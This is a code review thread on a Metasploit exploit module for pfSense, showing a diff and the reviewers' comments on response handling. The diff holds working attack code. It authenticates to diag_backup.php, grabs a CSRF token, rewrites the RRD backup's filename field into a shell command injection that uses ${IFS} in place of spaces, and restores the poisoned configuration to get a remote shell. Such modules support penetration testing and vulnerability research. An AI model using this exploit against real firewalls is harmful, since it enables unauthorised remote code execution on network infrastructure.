modules/exploits/unix/http/pfsense_config_data_exec.rb

```diff
@@ -0,0 +1,243 @@
+    post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
+    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'keep_cookies' => true
+    )
+
+    if res && res.code == 200 && res.body =~ /<rrddatafile>/
+      return res.body
+    else
+      return nil
+    end
+  end
+
+  def exploit
+    unless login
+      fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
+    end
+
+    csrf = get_csrf('diag_backup.php', 'GET')
+    unless csrf
+      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
+    end
+
+    config_data = drop_config
+    if config_data.nil?
+      fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
+    end
+
+    if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
+      fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
+    end
+    config_data.gsub!(' ', '${IFS}')
+    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
+    post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
+    post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
+    post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
+    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
+    post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'keep_cookies' => true
+    )
+
+    if res && res.code == 200 && res.body =~ /The configuration area has been restored\. The firewall may need to be rebooted\./
+      print_good('The configuration was successfully changed, please await your shell!')
+    else
+      print_error("The new configuration doesn't appear to have been applied!")
+      print_error('Please rerun the exploit with the HTTPTRACE option set to true and try debug the issue!')
+    end
```

Comment:
Seems clear a successful exploit attempt on the `2.6.0-RELEASE`  target provided results in a nil response. Any time I got a non nil response when testing I never got a session. Thinking this is the appropriate change: 
```suggestion
    if res&.code
      fail_with(Failure::UnexpectedReply, "The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
    end
```

Reply:
I haven't tested it, but according to your previous comment, this change seems to be necessary. One thing I'm wondering, any reason to check if the `code` attribute is not `nil`? Maybe `if res` would be enough?
```suggestion
    if res
      fail_with(Failure::UnexpectedReply, "The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
    end
```

Also, I believe the reason why the original code doesn't call `fail_with` is probably to avoid failing when an unexpected response is received. This would give a chance for the session to be established in case the behavior is different on specific versions of pfSense. Calling `fail_with` will terminate the module execution immediately. This might not be an issue if we are sure having a response always means a failure, which seems to be what you've experienced. This would be a good idea to test this with other versions of pfSense to validate the logic.

Reply:
My thought process behind testing the `code` attribute was that if I'm using it inside the `if` statement I should make sure it's not `nil` and that and non-nil response from `send_request_cgi` should have a non-nil `code` attribute. However I agree it makes more to just check `res`.

I've tested on three different versions now (`2.6.0-RELEASE`, `2.5.2-RELEASE`, `2.5.1-RELEASE`) and receiving a response always means a failure. Although I hear what you're saying. I agree it would be good practice to use `print_error` here instead of `fail_with` just incase a session is on it's way back to the user in the event of some untested edge case.